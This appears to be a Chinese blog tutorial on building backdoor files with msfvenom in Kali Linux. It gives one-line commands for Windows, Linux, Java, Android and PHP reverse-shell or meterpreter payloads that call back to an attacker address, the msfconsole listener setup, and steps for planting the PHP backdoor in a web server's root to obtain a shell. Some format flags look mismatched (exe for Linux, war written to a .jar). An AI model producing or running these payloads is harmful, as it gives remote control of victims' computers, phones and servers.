kali linux 生成后门文件命令:PHP,java,Linux,windows,android

生成后门文件:

在这里需要用到一个命令:msfvenom

在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。

下面示例的参数的解释直接通过-h参数查看就好,在下面就不再做多的说明了。


Windows后门:

[plain]  view plain  copy
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=1234 -f exe -o win_backdoor.exe   

kali linux 生成后门文件命令:PHP,java,Linux,windows,android_第1张图片


在msf控制台中,分别输入:

search handle

use exploit/multi/handler

show options

set payload windows/meterpreter/reverse_tcp

set LHOST 10.10.10.162

set LPORT 1234

最后执行exploit开始监听

将文件保存在Windows server 2k3中并运行,可以在Kali的监听窗口中得到meterpreter:

kali linux 生成后门文件命令:PHP,java,Linux,windows,android_第2张图片



Linux后门:

[plain]  view plain  copy
  1. msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.162 LPORT=4321 -f exe -o lin_backdoor  


Java后门:

[plain]  view plain  copy
  1. msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=1324 -f war -o java_backdoor.jar  

Android后门:

[plain]  view plain  copy
  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=2143 -f raw -o android_backdoor.apk  

PHP后门:

[plain]  view plain  copy
  1. msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=2134 -f raw -o php_backdoor.php  

将生成php后门文件上传到Windows server 2k3的Web根目录中,在Kali中跟上面的示例一样来监听端口,然后在第三台主机XP上对其进行访问,因为php文件是在服务器端执行的,可直接获得该Web服务器的shell:

kali linux 生成后门文件命令:PHP,java,Linux,windows,android_第3张图片


你可能感兴趣的:(kali,linux)